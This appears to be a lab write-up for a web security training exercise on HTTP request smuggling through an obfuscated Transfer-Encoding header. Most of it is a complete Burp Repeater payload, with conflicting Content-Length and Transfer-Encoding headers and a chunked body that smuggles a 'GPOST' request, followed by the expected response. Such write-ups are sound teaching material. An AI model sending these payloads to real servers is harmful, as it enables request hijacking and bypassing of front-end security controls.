HTTP request smuggling, obfuscating the TE header

Description

This lab involves a front-end and back-end server, and the front-end server doesn’t support chunked encoding.

Reproduction and proof of concept

  1. In Burp Suite, go to the Repeater menu and ensure that the “Update Content-Length” option is unchecked.

  2. Using Burp Repeater, issue the following request twice:

POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The second response should say: Unrecognized method GPOST.

Exploitability

An attacker will need to smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.

Last update: 2025-05-12 14:16